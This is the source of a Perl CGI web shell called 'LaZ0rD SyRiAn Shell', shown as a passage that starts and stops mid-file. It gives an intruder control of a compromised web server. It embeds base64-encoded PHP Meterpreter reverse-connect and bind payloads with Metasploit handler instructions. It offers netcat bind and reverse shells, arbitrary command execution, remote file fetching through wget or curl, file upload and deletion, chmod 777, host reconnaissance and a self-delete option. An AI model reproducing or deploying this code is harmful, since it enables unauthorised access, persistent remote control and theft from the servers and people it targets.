- $meter_p="PD9waHAgZXJyb3JfcmVwb3J0aW5nKDApOyRpcCA9ICIlaXAlIjskcG9ydCA9ICVyZV9wb3J0JTtpZiAoRkFMU0UgIT09IHN0cnBvcygkaXAsICI6IikpIHsJJGlwID0gIlsiLiAkaXAgLiJdIjt9aWYgKCgkZiA9ICdzdHJlYW1fc29ja2V0X2NsaWVudCcpICYmIGlzX2NhbGxhYmxlKCRmKSkgewkkcyA9ICRmKCJ0Y3A6Ly97JGlwfTp7JHBvcnR9Iik7CSRzX3R5cGUgPSAnc3RyZWFtJzt9IGVsc2VpZiAoKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgewkkcyA9ICRmKCRpcCwgJHBvcnQpOwkkc190eXBlID0gJ3N0cmVhbSc7fSBlbHNlaWYgKCgkZiA9ICdzb2NrZXRfY3JlYXRlJykgJiYgaXNfY2FsbGFibGUoJGYpKSB7CSRzID0gJGYoQUZfSU5FVCwgU09DS19TVFJFQU0sIFNPTF9UQ1ApOwkkcmVzID0gQHNvY2tldF9jb25uZWN0KCRzLCAkaXAsICRwb3J0KTsJaWYgKCEkcmVzKSB7IGRpZSgpOyB9CSRzX3R5cGUgPSAnc29ja2V0Jzt9IGVsc2UgewlkaWUoJ25vIHNvY2tldCBmdW5jcycpO31pZiAoISRzKSB7IGRpZSgnbm8gc29ja2V0Jyk7IH1zd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGxlbiA9IGZyZWFkKCRzLCA0KTsgYnJlYWs7Y2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7fWlmICghJGxlbikgewlkaWUoKTt9JGEgPSB1bnBhY2soIk5sZW4iLCAkbGVuKTskbGVuID0gJGFbJ2xlbiddOyRiID0gJyc7d2hpbGUgKHN0cmxlbigkYikgPCAkbGVuKSB7CXN3aXRjaCAoJHNfdHlwZSkgeyAJY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOwljYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7CX19JEdMT0JBTFNbJ21zZ3NvY2snXSA9ICRzOyRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7ZXZhbCgkYik7ZGllKCk7Pz4=";
- $meter_p=decode_base64($meter_p);
- $meter_p=~s/%re_port%/$port/;
- $meter_p=~s/%ip%/$ip/;
- $filename="meter.php";
- $meter_re="ok";
- }
- ##############################################
- #------ [ Meterpreter Bind Connection ] -----#
- ##############################################
- if (html_var('action') eq "meter_bind")
- {
- $ip=html_var('ip');
- msg_txt("[+] PHP Meterpreter -> Metasploit Bind Connection $bind_port ....Ok \n[+]For Connection Go To metasploit : \nmsf>use exploit/multi/handler\nmsf>set payload php/meterpreter/bind_tcp\nmsf>set LPORT $bind_port\nmsf>set RHOST $ip\nmsf>exploit");
- use MIME::Base64;
- $port=$bind_port;
- $ip=html_var('ip');
- $meter_p="PD9waHAgJHBvcnQgPSAlYmluZF9wb3J0JTskaXBhZGRyID0gIiVpcCUiO2lmIChpc19jYWxsYWJsZSgnc3RyZWFtX3NvY2tldF9zZXJ2ZXInKSkgewkkc3J2c29jayA9IHN0cmVhbV9zb2NrZXRfc2VydmVyKCJ0Y3A6Ly97JGlwYWRkcn06eyRwb3J0fSIpOwlpZiAoISRzcnZzb2NrKSB7IGRpZSgpOyB9CSRzID0gc3RyZWFtX3NvY2tldF9hY2NlcHQoJHNydnNvY2ssIC0xKTsJJHNfdHlwZSA9ICdzdHJlYW0nO30gZWxzZWlmIChpc19jYWxsYWJsZSgnc29ja2V0X2NyZWF0ZV9saXN0ZW4nKSkgewkkc3J2c29jayA9IHNvY2tldF9jcmVhdGVfbGlzdGVuKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsJaWYgKCEkcmVzKSB7IGRpZSgpOyB9CSRzID0gc29ja2V0X2FjY2VwdCgkc3J2c29jayk7CSRzX3R5cGUgPSAnc29ja2V0Jzt9IGVsc2VpZiAoaXNfY2FsbGFibGUoJ3NvY2tldF9jcmVhdGUnKSkgewkkc3J2c29jayA9IHNvY2tldF9jcmVhdGUoQUZfSU5FVCwgU09DS19TVFJFQU0sIFNPTF9UQ1ApOwkkcmVzID0gc29ja2V0X2JpbmQoJHNydnNvY2ssICRpcGFkZHIsICRwb3J0KTsJaWYgKCEkcmVzKSB7IGRpZSgpOyB9CSRzID0gc29ja2V0X2FjY2VwdCgkc3J2c29jayk7CSRzX3R5cGUgPSAnc29ja2V0Jzt9IGVsc2UgewlkaWUoKTt9aWYgKCEkcykgeyBkaWUoKTsgfXN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhaztjYXNlICdzb2NrZXQnOiAkbGVuID0gc29ja2V0X3JlYWQoJHMsIDQpOyBicmVhazt9aWYgKCEkbGVuKSB7CWRpZSgpO30kYSA9IHVucGFjaygiTmxlbiIsICRsZW4pOyRsZW4gPSAkYVsnbGVuJ107JGIgPSAnJzt3aGlsZSAoc3RybGVuKCRiKSA8ICRsZW4pIHsJc3dpdGNoICgkc190eXBlKSB7IAljYXNlICdzdHJlYW0nOiAkYiAuPSBmcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7CWNhc2UgJ3NvY2tldCc6ICRiIC49IHNvY2tldF9yZWFkKCRzLCAkbGVuLXN0cmxlbigkYikpOyBicmVhazsJfX0kR0xPQkFMU1snbXNnc29jayddID0gJHM7JEdMT0JBTFNbJ21zZ3NvY2tfdHlwZSddID0gJHNfdHlwZTtldmFsKCRiKTtkaWUoKTs=";
- $meter_p=decode_base64($meter_p);
- $meter_p=~s/%bind_port%/$bind_port/;
- $meter_p=~s/%ip%/$ip/;
- $filename="meter.php";
- $meter_bind="ok";
- }
- ##############################################
- #-------------- [ Bind Port ] ---------------#
- ##############################################
- # this is only the start
- if (html_var('action') eq "bind_port")
- {
- if (html_var('type') eq "perl1")
- {
- &text_start;
- print "[+] bind port $bind_port ....Ok\n[+] now use netcat :nc -n $ENV{'SERVER_ADDR'} $bind_port";
- &text_end;
- $bind_perl1="ok";
- }
- elsif(html_var('type') eq "perl2")
- {
- ##############################################
- #-------------- [ Bind Port 2]---------------#
- ##############################################
- if (html_var('type') eq "perl2")
- {
- &text_start;
- if ($os eq "Windows")
- {
- dont_work();
- }
- else
- {
- print "[+] bind port $bind_port ....Ok\n[+] now use netcat :nc -n $ENV{'SERVER_ADDR'} $bind_port";
- $bind_perl2="ok";
- }
- &text_end;
- }
- }
- elsif (html_var('type') eq "ruby")
- {
- ##############################################
- #------------ [ Bind Port Ruby ] ------------#
- ##############################################
- &text_start;
- print "[+] bind port $bind_port ....Ok\n[+] now use netcat :nc -n $ENV{'SERVER_ADDR'} $bind_port";
- &text_end;$bind_ruby="ok";
- }
- elsif(html_var('type') eq "inetd")
- {
- ##############################################
- #------------ [ Bind Port inetd] ------------#
- ##############################################
- &text_start;
- if ($os eq "Windows")
- {
- dont_work();
- }
- else
- {
- print "[+] bind port $bind_port ....Ok\n[+] now use netcat :nc -n $ENV{'SERVER_ADDR'} $bind_port";
- $bind_inetd="ok";
- }
- &text_end;
- }
- else
- {
- ##############################################
- #------------- [ Bind Port C ] -------------#
- ##############################################
- if ($os eq "Windows")
- {
- dont_work();
- }
- else
- {
- &text_start;
- print "[+] bind port $bind_port ....Ok\n[+] now use netcat :nc -n $ENV{'SERVER_ADDR'} $bind_port";
- $bind_c="ok";
- &text_end;
- }
- }
- }
- ##############################################
- #---------------- [ Revers ] ----------------#
- ##############################################
- our($rev_perl1,$rev_perl2,$rev_perl3,$rev_sh,$rev_ruby);
- if (html_var('action') eq "revers")
- {
- if (html_var('type') eq "perl")
- {
- &text_start;
- print "[+] Revers port $re_port ....Ok \n[+] use netcat :nc -vv -l -p $re_port";
- &text_end;
- $rev_perl1="ok";
- }
- elsif(html_var('type') eq "perl2")
- {
- ##############################################
- #-------------- [ Revers PERL 2] ------------#
- ##############################################
- &text_start;
- if ($os eq "Windows")
- {
- dont_work();
- }
- else
- {
- print "[+] Revers port $re_port ....Ok \n[+] use netcat :nc -vv -l -p $re_port";
- $rev_perl2="ok";
- }
- &text_end;
- }
- elsif(html_var('type') eq "perl3")
- {
- ##############################################
- #-------------- [ Revers PERL 3] ------------#
- ##############################################
- &text_start;
- if ($os eq "Windows")
- {
- dont_work();
- }
- else
- {
- print "[+] Revers port $re_port ....Ok \n[+] use netcat :nc -vv -l -p $re_port";
- $rev_perl3="ok";
- }
- &text_end;
- }
- elsif(html_var('type') eq "sh")
- {
- ##############################################
- #----------------- [ Revers Sh] -------------#
- ##############################################
- &text_start;
- if ($os eq "Windows")
- {
- dont_work();
- }
- else
- {
- print "[+] Revers port $re_port ....Ok \n[+] use netcat :nc -vv -l -p $re_port";
- $rev_sh="ok";
- }
- &text_end;
- }
- elsif(html_var('type') eq "c")
- {
- ##############################################
- #------------ [ Revers Port C ] ------------#
- ##############################################
- }
- else
- {
- ##############################################
- #-------------- [ Revers Ruby] --------------#
- ##############################################
- &text_start;
- print "[+] Revers port $re_port ....Ok \n[+] use netcat :nc -vv -l -p $re_port";
- &text_end;$rev_ruby="ok";
- }
- }
- ###########################################################
- ###########################################################
- ###-------------------- [ FunCt!0nS ] ------------------###
- ###########################################################
- ###########################################################
- #
- #
- #
- #
- ##############################################
- #-------------- [ Main ] ------------------#
- ##############################################
- sub Main
- {
- use FindBin qw{$RealBin};
- my $cookie_env=$ENV{'HTTP_COOKIE'};
- # GET Cookies....
- # You Can Use cookies like this : '$Cookies{cookie_name}'
- my @httpcookies = split(/; /,$cookie_env);
- foreach my $cookie(@httpcookies)
- {
- my ($id, $val) = split(/=/, $cookie);
- $Cookies{$id} = $val;
- }
- #defining the Opration system type
- if ($^O=~/win/i)
- {
- $os ="Windows"; # This SyStem is Windows so Fuck it ..!!
- }
- else
- {
- $os="Linux"; # This System is Linux so Have fun ..!!
- }
- # Header ....
- # Download File or normal header...
- if (html_var('action') ne "download")
- {
- # normal Header
- print header();
- style();
- java_code();
- }
- else
- {
- #download function
- download(html_var('filename'));
- }
- if(html_var('id') eq "logout")
- {
- # Logout ....
- Logout();
- }
- # did the user login or not
- if ($Cookies{'sy_shell'} ne create_session() or html_var('id') eq "logout")
- {
- Login_check();
- Login_page();
- CopyRight();
- exit();
- }
- # Chenge Dir
- if (html_var('pwd_dir'))
- {
- if (html_var('pwd_dir') ne $RealBin)
- {
- chdir(html_var('pwd_dir'));
- our $path=html_var('pwd_dir');
- }
- else
- {
- our $path=$RealBin;
- }
- }
- else
- {
- our $path=$RealBin;
- }
- # Main Cmd Execut
- if (html_var('id') eq "home")
- {
- if (html_var('action') eq "")
- {
- if ($os eq "Linux")
- {
- $cmd="ls -lia";
- }
- else
- {
- $cmd="dir"
- }
- msg_txt(Cmd($cmd)); # Execute The Cmd And Print The Resulte ...
- }
- }
- elsif(html_var('id') eq "Fuck")
- {
- # SuiCide
- if ($cgi->param('Delete') eq "Ok")
- {
- unlink($ENV{'SCRIPT_FILENAME'});
- shift_to("?id=home");
- }
- print '<body onload = "Suicide();">';
- exit();
- }
- elsif(html_var('id') eq "about")
- {
- # about
- about();
- }
- else
- {
- # Some Error ...!!!
- #shift_to("?id=home");
- }
- }
- ##############################################
- #------------ [ login session ] -------------#
- ##############################################
- sub create_session
- {
- use Digest::MD5 qw(md5_hex);
- return my $session = md5_hex($Username.":".$Password);
- }
- ##############################################
- #------------- [ Login staff ] --------------#
- ##############################################
- sub Login_check
- {
- if(html_var('pass') eq $Password and html_var('usrname') eq $Username)
- {
- # login ...ok
- my $tmp=create_session();
- print "
- <script>
- document.cookie='sy_shell=$tmp';
- var url = window.location.pathname;
- var filename = url.substring(url.lastIndexOf('/')+1);
- filename=filename+'?id=home';
- window.location=filename;
- </script>
- ";
- }
- else
- {
- # login ...error or user didnot login yet ...:):)
- if (html_var('usrname') or html_var('pass'))
- {
- print q[
- <script>
- alert ("Error !....0_o");
- </script>
- ];
- }
- }
- }
- ##############################################
- #------------- [ Cmd stuff ] ----------------#
- ##############################################
- sub Cmd
- {
- $|=1;
- my $cmd=shift;
- my $cm=$cmd;
- $cmd .= " |";
- my $cmd_txt="";
- open(CommandOutput, $cmd);
- while(<CommandOutput>)
- {
- $_ =~ s/(\n|\r\n)$//;
- $cmd_txt= "$cmd_txt $_\n";
- }
- $|=0;
- $cmd=$cm;
- return $cmd_txt;
- }
- ##############################################
- #--------------[ LoGin Page ] ---------------#
- ##############################################
- sub Login_page
- {
- # Just print Login Page ...
- print q[
- <html dir="ltr">
- <p align="center">
- <font face="Comic Sans MS" size="5" color="#CC0000">LaZ0rD SyRi</font><font face="Comic Sans MS" size="5" color="#008000">An Shell Professio</font><font face="Comic Sans MS" size="5" color="#808080">nal Version</font>
- </p>
- <div align="center" class="grey">
- <p>
- <font size="3">SyRiAn Fr33 TeAm <br>
- <br>
- <font size="2">SyRiAn HaCk3rS</font></p>
- <p> </p>
- </div>
- <form name="txtauth" method="POST" onSubmit="encode(txtauth.usrname);encode(txtauth.pass);">
- <div align="center">
- <table border="0" cellpadding="4" cellspacing="0" style="border: 1px double #dedede;" dir="ltr">
- <tr>
- <td colspan="2" align="center"> </td>
- </tr>
- <tr>
- <td>User:</td>
- <td>
- <input id="username" onblur="Blur('username','UserName')" onclick="Clear('username' ,'UserName')" type="text" name="usrname" value="UserName" size="20" maxlength="100" class="txtbox">
- </td>
- </tr>
- <tr>
- <td>Password:</td>
- <td>
- <input type="password" id="password" name="pass" value="" size="20" maxlength="100" class="txtbox">
- </td>
- </tr>
- <tr>
- <td align="left"> </td>
- <td align="right">
- <p align="center">
- <input type="submit" name="login" value="Login">
- </p>
- </td>
- </tr>
- </table>
- </div>
- </form>
- ];
- # If You See this line So You Can Be Cheater :)
- if ($cgi->param('cheat') eq "MyNameIsCheater")
- {
- print "<hr><center>Hello Cheater , UserName is : $Username,And PaSsW0rD Is :$Password.<hr>";
- }
- }
- ##############################################
- #-------------- [ CopyRight ] ---------------#
- ##############################################
- sub CopyRight
- {
- print q[
- <font color="gray" size="-2">
- <p align="center">
- <b>
- <font color="#808080" face="Verdana" size="1">C0d3d by <sy>~~ [ </sy>LaZorD SyRiAn <sy>]~~ [ </sy>G3t Fr33 0r D!3 HarD <sy>] ~~ </sy>SyRiAn Fr33 T3Am </font>
- </b>
- </p>
- <p align="center">
- <span lang="en-us">
- <b>
- <font size="1" face="Verdana" color="#DEDEDE">C</font></b></span><font size="1"><b><font face="Verdana" color="#DEDEDE">opyright © 20</font></b></font><span lang="en-us"><b><font size="1" face="Verdana" color="#DEDEDE">12</font>
- </b>
- </span>
- </p>
- </font>
- ];
- }
- ##############################################
- #--------------[ LoGout Page ] --------------#
- ##############################################
- sub Logout
- {
- print q[
- <script>
- document.cookie='sy_shell=4236a440a662cc8253d7536e5aa17942';
- </script>
- ];
- }
- ##############################################
- #---------------[ S H I F T To ]------------#
- ##############################################
- sub shift_to
- {
- my $to = shift;
- print "
- <script>
- var url = window.location.pathname;
- var filename = url.substring(url.lastIndexOf('/')+1);
- filename=filename+'$to';
- window.location=filename;
- </script>
- ";
- }
- ##############################################
- #--------------[ html forms ] ---------------#
- ##############################################
- sub html_var
- {
- use MIME::Base64;
- my $var = shift;
- if ($var ne "id")
- {
- if ($cgi->param($var) ne "")
- {
- return decode_base64($cgi->param($var));
- }
- else
- {
- return $cgi->param($var);
- }
- }
- else
- {
- return $cgi->param($var);
- }
- }
- ##############################################
- #--------------[ Java Code ] ----------------#
- ##############################################
- sub java_code
- {
- print q[
- <script>
- // Blur ...
- function Blur(id , defalutText)
- {
- if( document.getElementById(id).value == ''){document.getElementById(id).value = defalutText;}
- }
- function Clear(id , defalutText)
- {
- if( document.getElementById(id).value == defalutText)
- {
- document.getElementById(id).value = '';
- }
- }
- // Encode ...
- function encode(name)
- {
- var tmp = name;
- tmp.value = btoa(tmp.value);
- return true;
- }
- // Suicide
- function Suicide()
- {
- var confirmSuicide = confirm('Are You Sure You Wanna Delete the sh3ll ?');
- if(confirmSuicide == true)
- {
- document.location='?id=Fuck&Delete=Ok';
- }
- else
- {
- document.location='?id=home';
- }
- }
- //OUTPUT ....
- function Ch ()
- {
- if(document.getElementById('action_1').value == 'upload')
- {get_upload.enctype="multipart/form-data";document.getElementById('get').innerHTML = '<p align="center">Filename: <input name="fileme" size="35" type="file"><input type="hidden" name="action" value="dXBsb2Fk"></p>'; }
- else if (document.getElementById('action_1').value == 'download')
- {document.getElementById('get').innerHTML = '<input type="hidden" name="action" value="ZG93bmxvYWQ="><p align="center"><input type="text" id="download" onblur="Blur(download_u,download_u_v);" onclick="Clear(download_u,download_u_v);" name="filename" size="59" value="filename">';}
- else
- {document.getElementById('get').innerHTML = '<input type="hidden" name="action" value="ZmlsZWdldA=="><p align="center"><input type="text" name="fileUrl" id="file_url" onblur="Blur(file_u,file_u_v);" onclick="Clear(file_u,file_u_v);" size="59" value="http://www."><select name="getType"><option value="d2dldA==">Auto</option><option value="d2dldA==">wget</option><option value="Y3VybCAtbw==">curl -o</option><option value="Z2V0">get</option><option value="bHlueCAtc291cmNl">lynx -source</option></select>';}
- }
- function encode_get_upload()
- {
- if (get_upload.pwd_dir)
- {
- encode(get_upload.pwd_dir);
- }
- if (get_upload.fileUrl)
- {
- encode(get_upload.fileUrl);
- }
- if (get_upload.filename)
- {
- encode(get_upload.filename);
- }
- }
- // c....
- function ChangeInputs()
- {
- if(document.getElementById('actionType').value == 'rename')
- {document.getElementById('newName').innerHTML = '<p align="center"><input type="hidden" name="action" value="UmVuYW1lRmlsZQ=="><input type="text" name="RenameFile_a" id="commandLine4" value="File Name" size="40"> <input type="text" name="RenameFile_b" id="commandLine5" value="File New Name" size="40"> '; }
- else if (document.getElementById('actionType').value == 'delfile')
- {document.getElementById('newName').innerHTML = '<p align="center"><input type="text" name="delete_file" id="delet_fi" onblur="Blur(delet_file,delet_file_value);" onclick="Clear(delet_file,delet_file_value);" value="File or Folder Name" size="59"><select name="type"><option value="ZmlsZQ==">Delete File</option><option value="Zm9sZGVy">Delete Folder</option></select><input type="hidden" name="action" value="ZGVsZXRlZmlsZQ==">'; }
- else if (document.getElementById('actionType').value == 'copy')
- {document.getElementById('newName').innerHTML = '<p align="center"><input type="text" name="copy_a" id="copyfile_a" onblur="Blur(copyfiles_a,copyfiles_a_value);" onclick="Clear(copyfiles_a,copyfiles_a_value);" value="File 1" size="40"><input type="text" name="copy_b" id="copyfile_b" onblur="Blur(copyfiles_b,copyfiles_b_value);" onclick="Clear(copyfiles_b,copyfiles_b_value);" value="File 2" size="40"><input type="hidden" name="action" value="Y29weQ==">';}
- else if (document.getElementById('actionType').value == 'mkdir')
- {document.getElementById('newName').innerHTML = '<p align="center"><input type="text" name="foldername" id="makefolder" value="New Folder" onblur="Blur(make_folder,make_folder_value);" onclick="Clear(make_folder,make_folder_value);" size="40"><input type="hidden" name="action" value="bWtkaXI=">';}
- else if (document.getElementById('actionType').value == 'read_file')
- {document.getElementById('newName').innerHTML = '<p align="center"><input type="text" name="read" id="readfile" value="filename" onblur="Blur(read_file,read_file_value);" onclick="Clear(read_file,read_file_value);"size="40"><input type="hidden" name="action" value="cmVhZA=="><select name="type"><option value="cGVybA==">perl</option><option value="c3ltbGluaw==">SymLink</option></select>';}
- else if (document.getElementById('actionType').value == 'unZip')
- {document.getElementById('newName').innerHTML = '<p align="center"><input type="text" name="unzipname" id="unzipfile" value="Your zip File" onblur="Blur(unzip_file,unzip_file_value);" onclick="Clear(unzip_file,unzip_file_value);" size="40"><input type="hidden" name="action" value="dW56aXA=">';}
- else if (document.getElementById('actionType').value == '777')
- {document.getElementById('newName').innerHTML = '<p align="center"><input type="text" name="folder_f" id="folder_fin" value="Your Path" onblur="Blur(folder_find,folder_find_value);" onclick="Clear(folder_find,folder_find_value);" size="40"><input type="hidden" name="action" value="Nzc3">';}
- else if (document.getElementById('actionType').value == 'chmod')
- {document.getElementById('newName').innerHTML = '<p align="center"><input type="text" name="file" id="filec" value="filename.php" onblur="Blur(file_c,file_c_value);" onclick="Clear(file_c,file_c_value);" size="40"><input type="text" name="nu" value="777" size="40"><input type="hidden" name="action" value="Y2htb2Q=">';}
- else{document.getElementById('newName').innerHTML = '<p align="center"><input type="hidden" name="action" value="ZWRpdA=="><input type="text" name="filee" id="ede_file" onblur="Blur(edite_file,edite_file_value);" onclick="Clear(edite_file,edite_file_value);" value="Your File Path" size="40">'; }
- }
- // encode_file_handling
- function encode_file_handling()
- {
- if (file_handling.pwd_dir)
- {
- encode(file_handling.pwd_dir);
- }
- if (file_handling.RenameFile_a)
- {
- encode(file_handling.RenameFile_a);
- }
- if (file_handling.RenameFile_b)
- {
- encode(file_handling.RenameFile_b);
- }
- if (file_handling.filee)
- {
- encode(file_handling.filee);
- }
- if (file_handling.delete_file)
- {
- encode(file_handling.delete_file);
- }
- if (file_handling.copy_a)
- {
- encode(file_handling.copy_a);
- }
- if (file_handling.copy_b)
- {
- encode(file_handling.copy_b);
- }
- if (file_handling.foldername)
- {
- encode(file_handling.foldername);
- }
- if (file_handling.zipname)
- {
- encode(file_handling.zipname);
- }
- if (file_handling.unzipname)
- {
- encode(file_handling.unzipname);
- }
- if (file_handling.read)
- {
- encode(file_handling.read);
- }
- if (file_handling.genServpath)
- {
- encode(file_handling.genServpath);
- }
- if (file_handling.folder_f)
- {
- encode(file_handling.folder_f);
- }
- if (file_handling.file)
- {
- encode(file_handling.file);
- }
- if (file_handling.nu)
- {
- encode(file_handling.nu);
- }
- if (file_handling.for_dir)
- {
- encode(file_handling.for_dir);
- }
- }
- // evalOrEnc2
- function evalOrEnc2()
- {
- var temp;
- if(document.getElementById('evalOrEnc').value == 'eval')
- {
- temp = 'print "Hello,all";';
- }
- else if(document.getElementById('evalOrEnc').value == 'enc')
- {
- temp = 'my String To Encrypt';
- }
- else if(document.getElementById('evalOrEnc').value == 'analyze')
- {
- temp = 'c4ca4238a0b923820dcc509a6f75849b';
- }
- return temp;
- }
- function chen_eval(temp)
- {
- if (temp == 'print "Hello,all";')
- {
- scan_str.action.value='ZXZhbA==';
- }
- else if(temp == 'my String To Encrypt')
- {
- scan_str.action.value='ZW5j';
- }
- else if(temp == 'c4ca4238a0b923820dcc509a6f75849b')
- {
- scan_str.action.value='YW5hbHl6ZQ==';
- }
- document.getElementById('tool').value= temp;
- }
- // some var'z 0_×
- var edite_file = 'ede_file';
- var edite_file_value='Your File Path';
- var delet_file = 'delet_fi';
- var delet_file_value='File or Folder Name';
- var copyfiles_a = 'copyfile_a';
- var copyfiles_a_value='File 1';
- var copyfiles_b = 'copyfile_b';
- var copyfiles_b_value='File 2';
- var make_folder = 'makefolder';
- var make_folder_value='New Folder';
- var read_file='readfile';
- var read_file_value='filename';
- var folder_find = 'folder_fin';
- var folder_find_value = 'Your Path';
- var file_c = 'filec';
- var file_c_value = 'filename.php';
- var file_u = 'file_url';
- var file_u_v = 'http://www.';
- var download_u = 'download';
- var download_u_v = 'filename';
- </script>
- ];
- }
- ##############################################
- #---------------[textarea start ]------------#
- ##############################################
- sub text_start
- {
- print q[<textarea rows="24" readonly>];
- }
- ##############################################
- #---------------[textarea end ] -------------#
- ##############################################
- sub text_end
- {
- print q[</textarea>];
- }
- ##############################################
- #---------------[ msg_txt ] -------------#
- ##############################################
- sub msg_txt
- {
- text_start;
- print shift;
- text_end;
- }
- ##############################################
- #--------------[ About Page ] --------------#
- ##############################################
- sub about
- {
- print '
- <center><br>
- <table border="1" width="51%">
- <tr>
- <td width="83">
- <font color="gray" size="-2">Author:</font></td>
- <td>
- <font color="gray" size="-2">LaZ0rd SyRiAn </font></td>
- </tr>
- <tr>
- <td width="83">
- <font color="gray" size="-2">Author e-mail: </font></td>
- <td>
- <font color="gray" size="-2">
- <a href="mailto:LaZ0rd-SyRiAn@hacker.ps">
- LaZ0rd-SyRiAn@hacker.ps</a></font></td>
- </tr>
- <tr>
- <td width="83">
- <font color="gray" size="-2">Thanx : </font></td>
- <td>
- <font color="gray" size="-2">[ PLiiiJl~HaCKer ][ AmRaNhM ][ Error 404
- ] [ Anti-Trust ] [ BaD-HaCKeR-MaN ][ All Perl Geeks ]
- </font></td>
- </tr>
- <tr>
- <td align="center" valign="top" colspan="2">
- <font color="gray" size="-2">
- <p>I Am LaZ0rD SyRiAn [ Mike is My real name ] From SyRiAn
- Arabic Republic My Age 12/1994 </p>
- <p>I am (C , PERL , PHP , Paython , autoit,ruby) coder you
- can say Programming G33k</p>
- <p>My Team Is SyRiAn Fr33 T3AM </p>
- </font>
- <font color="gray" face="Comic Sans MS" style="font-size: 7pt">
- <p align="center"><sy>G3t Fr33 OR D!3 HarD</sy></p></font></td>
- </tr>
- </table><sy><br> </table> <table bgcolor="#cccccc" width="100%">
- <tr>
- <td width="100%">[<a href="#top">TOP</a></sy>] <center>
- ';
- CopyRight;
- exit;
- }
- ##############################################
- #--------------[ S T Y L E ] ---------------#
- ##############################################
- sub style
- {
- print <<END;
- <head>
- <title>1aZ0rD SyR!An Sh311 ~ V3~ [ G3t Fr33 OR D!3 HarD ]</title>
- <meta http-equiv="Content-Type" content="text/html;" charset="windows-1256">
- <style>
- BODY {
- FONT-FAMILY: Verdana;
- margin: 2;
- color: #cccccc;
- background-color: $Color_3;
- }
- sym {
- color: $Color_1;
- font-size: 10pt;
- font-weight: bold;
- }
- sy {
- color: $Color_1;
- font-size: 7pt;
- font-weight: bold;
- }
- syy {
- color: $Color_1;
- font-size: 8pt;
- font-weight: bold;
- }
- #Box {
- color: #990000;
- font-size: 14px;
- background-color: #000;
- font-weight: bold;
- }
- tr {
- BORDER-RIGHT: #cccccc 1px solid;
- BORDER-TOP: #cccccc 1px solid;
- BORDER-LEFT: #cccccc 1px solid;
- BORDER-BOTTOM: #cccccc 1px solid;
- color: #ffffff;
- }
- td {
- BORDER-RIGHT: #cccccc 1px solid;
- BORDER-TOP: #cccccc 1px solid;
- BORDER-LEFT: #cccccc 1px solid;
- BORDER-BOTTOM: #cccccc 1px solid;
- color: #cccccc;
- }
- .table1 {
- BORDER: 1px none;
- BACKGROUND-COLOR: #000000;
- color: #333333;
- }
- .td1 {
- BORDER: 1px none;
- color: #ffffff;
- font-style: normal;
- font-variant: normal;
- font-weight: normal;
- font-size: 7pt;
- font-family: tahoma;
- }
- .tr1 {
- BORDER: 1px none;
- color: #cccccc;
- }
- table {
- BORDER: #eeeeee outset;
- BACKGROUND-COLOR: #000000;
- color: #cccccc;
- }
- input {
- BORDER-RIGHT: $Color_1 1px solid;
- BORDER-TOP: $Color_1 1px solid;
- BORDER-LEFT: $Color_1 1px solid;
- BORDER-BOTTOM: $Color_1 1px solid;
- BACKGROUND-COLOR: #333333;
- font: 9pt tahoma;
- color: $Color_4;
- }
- select {
- BORDER-RIGHT: #ffffff 1px solid;
- BORDER-TOP: #999999 1px solid;
- BORDER-LEFT: #999999 1px solid;
- BORDER-BOTTOM: #ffffff 1px solid;
- BACKGROUND-COLOR: #000000;
- font: 9pt tahoma;
- color: #CCCCCC;
- }
- submit {
- BORDER: 1px outset buttonhighlight;
- BACKGROUND-COLOR: #272727;
- width: 40%;
- color: #cccccc;
- }
- textarea {
- width: 100%;
- BORDER-RIGHT: #ffffff 1px solid;
- BORDER-TOP: #999999 1px solid;
- BORDER-LEFT: #999999 1px solid;
- BORDER-BOTTOM: #ffffff 1px solid;
- BACKGROUND-COLOR: $Color_5;
- color: #ffffff;
- }
- A:link {
- COLOR: $Color_1;
- TEXT-DECORATION: none;
- }
- A:visited {
- COLOR: $Color_1;
- TEXT-DECORATION: none;
- }
- A:active {
- COLOR: $Color_1;
- TEXT-DECORATION: none;
- }
- A:hover {
- color: blue;
- TEXT-DECORATION: none;
- }
- </style>
- </head>
- END
- if (html_var('id') ne "logout")
- {
- unless($Cookies{'sy_shell'} ne create_session())
- {
- head_and_info();
- }
- }
- }
- ##############################################
- #------------ [ HTML & Style ] --------------#
- ##############################################
- sub head_and_info
- {
- #GET PHP VERSION
- my @php_v =split(/PHP\//,$ENV{'SERVER_SOFTWARE'});
- if ($php_v[1] eq "")
- {
- $php_v[1]="Unknown";
- }
- #GET HOST NAME
- use Sys::Hostname ;
- my $host=hostname;
- my ($sname,$pwd,$id_i,$t,$da,$ho,$tim);
- #UNAME
- if ($os eq "Linux")
- {
- $sname=`uname -an`;
- $pwd=$ENV{'SCRIPT_FILENAME'};
- $id_i=`id`;
- }
- else
- {
- $sname=`ver`;
- $pwd=$ENV{'SCRIPT_FILENAME'};
- $id_i =`whoami`;
- }
- use Time::Piece;
- $t = localtime;
- $da = $t->ymd;
- $ho =$t->hms;
- $tim = "$da $ho";
- print <<END;
- <table bgcolor="#cccccc" cellpadding="0" cellspacing="0" width="100%">
- <tr>
- <td bgcolor="#000000" width="160"><span>
- <p align="center"><syy>
- --------------------</syy><br><font size="2" color="#FF0000">LaZ</font><font color="#008000" size="2">0rD
- SyRi</font><font size="2" color="#999999"><font>An Sh3ll</font><syy><br>
- --------------------<br>
- Professional version <br>
- Perl Shell</syy> </font></p>
- </span></td>
- <td bgcolor="#000000">
- <!------ Header ------>
- <p dir="ltr">
- <font size="1"> <b>[<a href="?id=home">Main</a>]</b></span>
- <b>[</span><a href="?id=about">About</a>]</b></span>
- <b>[</span><a href="?id=logout">Logout</a>]</b></span>
- <b>[</span><a href="?id=Fuck">SuiCide</a>]</b></span>
- <br>
